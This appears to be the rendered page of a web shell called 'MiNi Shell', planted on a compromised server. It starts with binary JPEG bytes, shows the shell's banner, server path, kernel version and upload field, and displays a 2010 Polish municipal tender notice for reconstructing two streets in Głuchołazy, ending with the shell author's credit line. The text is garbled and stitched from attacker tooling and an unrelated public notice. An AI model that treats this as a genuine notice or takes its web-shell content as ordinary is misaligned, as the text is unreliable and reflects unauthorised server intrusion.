JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100121/14527-N-2010.html

<p class="kh_header"><b>Głuchołazy: Przebudowa gminnych dróg 
w ramach Narodowego Programu Przebudowy Dróg Lokalnych  2008-2011.
Rozbudowa nawierzchni ulic, chodników wraz z odwodnieniem oraz przebudową sieci oświetlenia ulicznego kablowego, obejmującego: ul. Kościuszki - droga publiczna - (odcinek od skrzyżowania z ul. Skłodowską do skrzyżowania z ul. Kolejową)                                  i ul. Skłodowską - droga publiczna (od skrzyżowania z ul. Kościuszki do skrzyżowania                      z ul. Wyszyńskiego)w miejscowości Głuchołazach.</b><br>
<b>Numer ogłoszenia: 14527 - 2010; data zamieszczenia: 21.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Głuchołaz , Rynek 15, 48-340 Głuchołazy, woj. opolskie, tel. 077 4092100, faks 077 4092101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glucholazy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa gminnych dróg 
w ramach Narodowego Programu Przebudowy Dróg Lokalnych  2008-2011.
Rozbudowa nawierzchni ulic, chodników wraz z odwodnieniem oraz przebudową sieci oświetlenia ulicznego kablowego, obejmującego: ul. Kościuszki - droga publiczna - (odcinek od skrzyżowania z ul. Skłodowską do skrzyżowania z ul. Kolejową)                                  i ul. Skłodowską - droga publiczna (od skrzyżowania z ul. Kościuszki do skrzyżowania                      z ul. Wyszyńskiego)w miejscowości Głuchołazach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa gminnych dróg 
w ramach Narodowego Programu Przebudowy Dróg Lokalnych  2008-2011.
Rozbudowa nawierzchni ulic, chodników wraz z odwodnieniem oraz przebudową sieci oświetlenia ulicznego kablowego, obejmującego: ul. Kościuszki - droga publiczna - (odcinek od skrzyżowania z ul. Skłodowską do skrzyżowania z ul. Kolejową)                                  i ul. Skłodowską - droga publiczna (od skrzyżowania z ul. Kościuszki do skrzyżowania                      z ul. Wyszyńskiego) w miejscowości Głuchołazy.
Dane techniczne (orientacyjny zakres prac):
a) dot. ul. Skłodowskiej (powierzchnia jezdna 3.341,00 m2, powierzchnia chodników 1343,22 m2):
- odtworzenie trasy i punktów wysokościowych drogi,
- rozbiórka elementów dróg, ogrodzeń i przepustów,
- wykopy w gruntach nieskalistych,
- regulacja pionowa urządzeń obcych i montaż studzienek ściekowych,
- warstwy odsączające i odcinające,
- podbudowa z tłucznia kamiennego,
- podbudowa z betonu asfaltowego,
- roboty asfaltowe,
- nawierzchnie z kostki granitowej,
- nawierzchnie z kostki betonowej brukowej gr. 8 cm,
- ścieki z kostki kamiennej,
- krawężniki kamienne,
- obrzeża kamienne,
- oznakowania poziome,
- oznakowania pionowe,
- oznakowania docelowe,

b) dot. ul. Kościuszki (powierzchnia jezdna 3.418,00 m2, powierzchnia chodników 
3.703,70 m2):
- odtworzenie trasy i punktów wysokościowych drogi,
- rozbiórka elementów dróg, ogrodzeń i przepustów,
- wykopy w gruntach nieskalistych,
- regulacja pionowa urządzeń obcych i montaż studzienek ściekowych,
- warstwy odsączające i odcinające,
- podbudowa z tłucznia kamiennego,
- podbudowa z betonu asfaltowego,
- roboty asfaltowe,
- nawierzchnie z kostki  granitowej,
- nawierzchnie z kostki betonowej brukowej gr. 8 cm,
- ścieki  z kostki kamiennej,
- krawężniki kamienne,
- obrzeża kamienne,
- oznakowania poziome,
- oznakowania pionowe,
- oznakowania docelowe,
- zieleń drogowa

Kanalizacja deszczowa w ul. Skłodowskiej:
- przykanaliki deszczowy fi 200 z rur PVC - 100,80 mb
- studzienki ściekowe betonowe z wpustami ulicznymi - 9 szt.
- studzienki ściekowe betonowe z wpustami chłonnymi - 9 szt.
- studnie rewizyjne fi 1200 - 17 szt.

Kanalizacja deszczowa w ul. Kościuszki:
- przykanaliki deszczowy fi 200 z rur PVC - 105,70 mb
- studzienki ściekowe betonowe z wpustami ulicznymi - 26 szt.
- studzienki ściekowe betonowe z wpustami chłonnymi - 9 szt.
- studnie rewizyjne fi 1200 - 8 szt.

Kablowa instalacja oświetlenia ulicznego ul. Kościuszki i Skłodowskiej:
- kabel ziemny 4 x 35 mm - 965,00 mb
- rury ochronne na kabel DVK-75 - 560,00 mb
- latarnie oświetlenia ulicznego - 18 szt.,
- oprawy naścienne oświetlenia ulicznego - 8 szt.,
- demontaż starego oświetlenia ulicznego wraz z linią napowietrzną

Szczegółowy zakres robót zgodnie z przedmiarami robót 
Wymagania techniczne zostały określone w projekcie budowlano-wykonawczym oraz specyfikacji technicznej wykonania i odbioru robót stanowiącymi integralną część dokumentacji technicznej.

UWAGA !!!
1. Zamawiający wymaga składowania urobku /ziemi z wykopów/ we wskazanym miejscu w odległości około 1,5 km od miejsca robót. Za składowany urobek nie będą pobierane opłaty.
2. Wykonawca zobowiązany jest do prowadzenia robót w sposób umożliwiający zachowanie komunikacji i przejezdności części drogi dla pojazdów i pieszych (wskazane prowadzenie robót systemem połówkowym).

Dodatkowe elementy mające wpływ na koszt budowy, które Wykonawca winien uwzględnić w cenie oferty::
- geodezyjny koszt obsługi budowy,
- koszty map powykonawczych,
- koszty badań i sprawdzeń /wskaźniki zagęszczenia gruntu, warstw podbudowy itp./.
- koszty badań i sprawdzeń geologicznych gruntu,
- koszty związane z organizacją ruchu w czasie trwania robót wraz z opracowaniem i zatwierdzeniem projektów organizacji ruchu, montażem oznakowań, wykonaniem tymczasowych przejść dla pieszych
- koszty ubezpieczenia budowy,
- koszty organizacji zaplecza budowy /placu budowy wraz z kosztami energii, wody itp./,
- koszty dozoru budowy,
- odzysk części materiałów drogowych z rozbiórki elementów drogowych (kostka kamienna, płytki chodnikowe, krawężniki, frezowina, itp), które zamawiający uzna za nadające się do ponownego wykorzystania na swoich innych obiektach wraz z ich transportem w miejsce wskazane przez Zamawiającego odległe max. 1 km od budowy.
- koszty nadzoru geologiczno - archeologicznego zakresu robót objętych pozwoleniem konserwatorskim.

Zamawiający wymaga udzielenia przez Wykonawcę co najmniej  3-letniej gwarancji jakości..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.23.30.00-0, 45.25.56.00-5, 45.23.22.10-7, 45.31.61.10-9, 45.31.23.10-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1 Oferta musi być zabezpieczona wadium w wysokości: 50 000,00zł. Słownie złotych: pięćdziesiąt tysięcy złotych 

2. Forma Wadium

1) Wadium może być wniesione w następujących formach:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275).
2) W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,
c) kwotę gwarancji,
d) termin ważności gwarancji,
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie  Zamawiającego zawierające oświadczenie:
    - iż Wykonawca, który złożył ofertę w odpowiedzi na wezwanie Zamawiającego, o którym mowa w art. 26 ust. 3 u.p.z.p., nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw;
    - iż Wykonawca, którego ofertę wybrano:
       -odmówił podpisania umowy na warunkach określonych w ofercie, lub
       - nie wniósł zabezpieczenia należytego wykonania umowy, lub
       - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
3) Postanowienia pkt 11.2. stosuje się odpowiednio do poręczeń, określonych powyżej w pkt.  2.b) i 2.e).

3. Miejsce i sposób wniesienia wadium.
1) Wadium wnoszone w pieniądzu należy wpłacać przelewem na następujący nr konta: WBK S,A. 29 1090 2167 0000 0005 6200 0051z dopiskiem:-Wadium na rozbudowę nawierzchni ulic, chodników ul. Kościuszki- Skłodowskiej w Głuchołazach.
    Zaleca się do oferty dołączyć kopię polecenia przelewu.
2) Wadium wnoszone w innych formach niż pieniądz należy dołączyć w oryginale do oryginalnego egzemplarza oferty.

4. Termin wniesienia wadium.
    Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.

5. Zwrot wadium.
    Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 u.p.z.p.

6. Utrata wadium.
Zamawiający zatrzymuje wadium wraz z odsetkami:
    - jeżeli Wykonawca, który złożył ofertę w odpowiedzi na wezwanie Zamawiającego, o którym mowa w art. 26 ust. 3 u. p.z.p. nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie;
    - jeżeli Wykonawca, którego oferta została wybrana:
         - odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
         -nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
         - zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy:
1.	 nie podlegają wykluczeniu z art. 24 ust. 1 ustawy Pzp
2.	 spełniają warunki z art. 22 ust. 1 ustawy Pzp, a to: 
2.1.	 posiadają wiedzę i doświadczenie tj. 
Posiadają doświadczenie w zakresie wykonania co najmniej 3  robót budowlanych  tożsamych z przedmiotem niniejszego postępowania, polegających na budowie, przebudowie lub remoncie drogi o powierzchni co najmniej 3.500 m2 każda; wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie
2.2.  dysponują osobami zdolnymi do wykonania zamówienia:
Dysponują osobą lub osobami, która-którzy będzie-będą  uczestniczyć w wykonywaniu zamówienia jako :
a) kierownik budowy, który posiada kwalifikacje zawodowe niezbędne do wykonania zamówienia oraz posiada wymagane uprawnienia branży drogowej , przynależy do stosownej izby zawodowej;  a ponadto posiada wymagane uprawnienia do  wykonywania robót w obiektach zabytkowych, oraz przynależy do stosownej izby zawodowej;
b) kierownik robót, który posiada-posiadają kwalifikacje zawodowe niezbędne do wykonania zamówienia oraz posiada-posiadają wymagane uprawnienia branży elektrycznej i instalacyjnej 
2.3.  sytuacji finansowej:
- posiadają rachunek w banku lub spółdzielczej kasy oszczędnościowo-kredytowej, na którym posiadają środki finansowe  lub zdolność kredytową  w wysokości nie mniejszej niż 1.500.000,00 zł 

Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia). Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że wyżej wymienione warunki wykonawca spełnił. Nie spełnienie chociażby jednego z postawionych warunków udziału w postępowaniu, spowoduje wykluczenie wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I.  
Zgodnie z  Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. (Dz. U. Nr 226, poz. 1817) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane

A) W celu spełniania przez Wykonawcę warunków żądanych przez Zamawiającego , zgodnie z art. 22 ust. 1 ustawy Pzp Zamawiający żąda:

1. oświadczenie o  spełnianianiu warunków z art. 22 ust. 1 ustawy Pzp (załącznik nr 2 siwz),
Dopuszcza się możliwość złożenia jednego wspólnego oświadczenia z art. 22 ust. 1 ustawy -Prawo zamówień publicznych, pod warunkiem, iż oświadczenie to zostanie podpisane w imieniu wszystkich podmiotów występujących wspólnie lub przez wszystkie podmioty składające ofertę wspólną;
2. wykaz 3 robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, tożsamych z przedmiotem zamówienia, związanych z budową, przebudową lub remontem drogi o powierzchni co najmniej 3.500 m2 każda, wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości netto, daty i miejsca  wykonania, oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (załącznik nr 4 siwz).
W przypadku składania oferty przez wykonawców występujących wspólnie, ww. dokument wykonawcy mogą spełnić łącznie - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich  wykazywać będą spełnienie tego warunku.
3. wykaz osób (załącznik nr 5 siwz):
3.1.  dot. kierownika budowy, który będzie uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat jego kwalifikacji zawodowych niezbędnych do wykonania zamówienia (wymagane  uprawnienia branży drogowej oraz przynależność do stosownej izby zawodowej, i wymagane uprawnienia do  wykonywania robót w obiektach zabytkowych, oraz przynależność do stosownej izby zawodowej), wraz z informacją o podstawie do dysponowania tą osobą
3.2. dot. kierownika-kierowników robót, który-którzy będzie-będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat jego/ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia (wymagane uprawnienia branży elektrycznej i instalacyjnej oraz przynależność do stosownej izby zawodowej), wraz z informacją o podstawie do dysponowania tą/tymi osobą-osobami
W przypadku składania oferty przez wykonawców występujących wspólnie, ww. dokumenty wykonawcy mogą spełnić łącznie - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich  wykazywać będą spełnienie tego warunku.
4. oświadczenia, że kierownik budowy oraz kierownik-kierownicy robót posiadają  uprawnienia (odpowiednio do pkt.2.4 siwz rozdziału 10): branży drogowej, do wykonywania robót w obiektach zabytkowych, branży elektrycznej, instalacyjnej oraz przynależą do stosownej izby zawodowej.
W przypadku składania oferty przez wykonawców występujących wspólnie, ww. dokument wykonawcy mogą spełnić łącznie - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich  wykazywać będą spełnienie tego warunku.

5. informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej  posiadane środki finansowe lub zdolność kredytową wykonawcy w wysokości nie mniejszej niż 1.500.000,00 zł, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku składania oferty przez wykonawców występujących wspólnie, ww. dokument wykonawcy mogą spełnić łącznie - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich  wykazywać będą spełnienie tego warunku.
Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących
sytuacji finansowej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.  
6. Zgodnie z art. 26 ust. 2b ustawy Pzp Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia i zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności  przedstawiając w  tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
7. Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów  dokumentów:
7.1.	oświadczenie o braku podstaw do wykluczenia z art. 24 ust. 1 ustawy Pzp (załącznik nr 3 siwz),
7.2. aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia Wykonawcy w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust.1 pkt 2 ustawy  (załącznik nr 9 do SIWZ)

B)W celu wykazania braku podstaw do wykluczenia Wykonawcy z postępowania o zamówienie publiczne w okolicznościach, o których mowa art. 24 ust.1. ustawy Pzp Zamawiający żąda:
1.	oświadczenie o braku podstaw do wykluczenia z art. 24 ust. 1 ustawy Pzp,
2.   aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia Wykonawcy w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust.1 pkt 2 ustawy  (zgodnie z załącznik nr 9 do SIWZ)
W przypadku składania oferty przez wykonawców występujących wspólnie, ww. dokument musi być złożony przez każdego wykonawcę.

UWAGA!
Dla Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium RP, zamiast dokumentu określonego w lit. A pkt 7.2 oraz lit. B pkt 2 siwz zastosowanie mają przepisy § 4  Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).
II. Inne oświadczenia i dokumenty, które należy przedłożyć wraz z ofertą:
1. Formularz Ofertowy, sporządzony na podstawie wzoru stanowiącego  załącznik nr 1 do niniejszej SIWZ.
2.	Pełnomocnictwo ustanowione do reprezentowania wykonawców ubiegających się o udzielenie zamówienia publicznego. W przypadku podmiotów wspólnie ubiegających się o zamówienie,pełnomocnictwo takie może wynikać z dołączonej do oferty umowy konsorcjum lub umowy spółki cywilnej.
Pełnomocnictwo   należy dołączyć w oryginale  bądź kopii   potwierdzonej za zgodność z oryginałem notarialnie.
3.	kosztorys ofertowy
4.  celem określenia statusu prawnego Wykonawcy zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ( dotyczy osób fizycznych wskazanych w § 2 pkt 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzaju dokumentów , jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - termin realizacji zamówienia - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://gmina.glucholazy.sisco.info/?przetargi=1&rok=2010&mc=2.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Głuchołazach ul. Rynek 15 48-340 Głuchołazy, Wydział Zamówień Publicznych pok. nr 16, I piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2010 godzina 10:00, miejsce: Urząd Miejski w Głuchołazach ul. Rynek 15 48-340 Głuchołazy, Wydział Zamówień Publicznych pok. nr 16, I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com